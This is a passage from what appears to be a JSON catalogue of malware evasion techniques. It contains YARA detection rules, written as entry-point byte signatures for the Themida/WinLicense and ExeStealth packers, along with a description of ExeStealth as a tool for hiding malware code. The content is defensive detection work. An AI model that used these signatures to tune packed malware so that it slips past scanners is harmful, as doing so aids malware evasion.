00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V10X_V17X_DLL_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 ?? 89 48 01 61 E9 }\r\n        $b = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_Oreans_Technologies_2004: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 }\r\n        $b = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 11 02 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_Oreans_Technologies_2004_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_1800_compressed_engine_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1920_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 14 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V2100_p_Oreans_Technologies_20090917: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 EC 04 50 53 E8 ?? ?? 00 00 CC 58 8B D8 40 2D ?? ?? ?? ?? 2D ?? ?? ?? ?? 05 ?? ?? ?? ?? 80 3B CC 75 19 C6 03 00 BB 00 10 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 50 E8 0A 00 00 00 83 C0 00 89 44 24 08 5B 58 C3 55 8B EC 60 8B 75 08 8B 4D 0C C1 E9 02 8B 45 10 8B 5D 14 EB 08 31 06 01 1E 83 C6 04 49 0B C9 75 F4 61 C9 C2 10 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1820_p_Oreans_Technologies_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_v2018_c2007_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 EC 04 50 53 E8 00 00 00 00 58 8B D8 2D 00 ?? ?? 00 2D ?? ?? ?? 00 05 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule themida_1005_http58wwworeanscom: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_NoCompression_SecureEngine_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19Xnbsp_Oreans_Technologiesnbsp_nbsp_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 }\r\n        $b = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 43 4F 4D 43 54 4C 33 32 2E 64 6C 6C 00 00 00 49 6E 69 74 43 6F 6D 6D 6F 6E 43 6F 6E 74 72 6F 6C 73 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_1201_compressed_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_Other_Oreans_Technologies_20080131: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_Oreans_Technologies_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 11 02 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1920: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 14 02 00 00 }\r\n        $b = { BE ?? ?? BF ?? ?? B9 ?? ?? 56 FC F3 A5 5F E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_18xx_19xx_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1X_V2X_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 43 4F 4D 43 54 4C 33 32 2E 64 6C 6C 00 00 00 49 6E 69 74 43 6F 6D 6D 6F 6E 43 6F 6E 74 72 6F 6C 73 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 }\r\n        $b = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n        $c = { 55 8B EC 83 C4 D8 60 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_10xx_1800_compressed_engine_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule themida_1005_httpwwworeanscom: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1000_V1800_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1802_p_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_18xx_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_Other_Oreans_Technologies_SignByfly_20080131: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1802_p_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V2X_Oreans_Technologies_20080131: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_v2065_or_newer_c2009_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { 52 BA 64 00 00 00 EB 1B B9 00 10 00 00 EB 05 03 C1 03 C3 49 0B C9 75 F7 52 54 54 FF 15 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_v2010_v2065_or_newer: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 EC 04 50 53 E8 ?? 00 00 00 CC 58 8B D8 40 2D 00 ?? ?? 00 2D ?? ?? ?? 00 05 ?? ?? ?? 00 80 3B CC 75 19 C6 03 00 BB 00 10 00 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_Oreans_Technologies_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 }\r\n        $b = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 11 02 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ThemidaWinLicense_V1000_V1800_Oreans_Technologies_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 186,
            "unprotect_id": "U1405",
            "name": "ExeStealth",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "ExeStealth is a tool that encrypts files to avoid detection and hacking. Designed by WebToolMaster, this free software is simple to implement and one of the best anti-hacking tools on the market, which also makes it effective at hiding malware code in your system.",
            "resources": "https://www.webtoolmaster.com/exestealth.htm",
            "tags": "ExeStealth",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 104,
                    "key": "yara_detect_exestealth",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Exestealth",
                    "rule": "rule ExeStealth_WebToolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_275_WebtoolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C9 B4 4E CD 21 73 02 FF ?? BA ?? 00 B8 ?? 3D CD 21 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_276_Unregistered_WebtoolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_276_Unregistered_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_275_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ExeStealth_WebToolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 185,
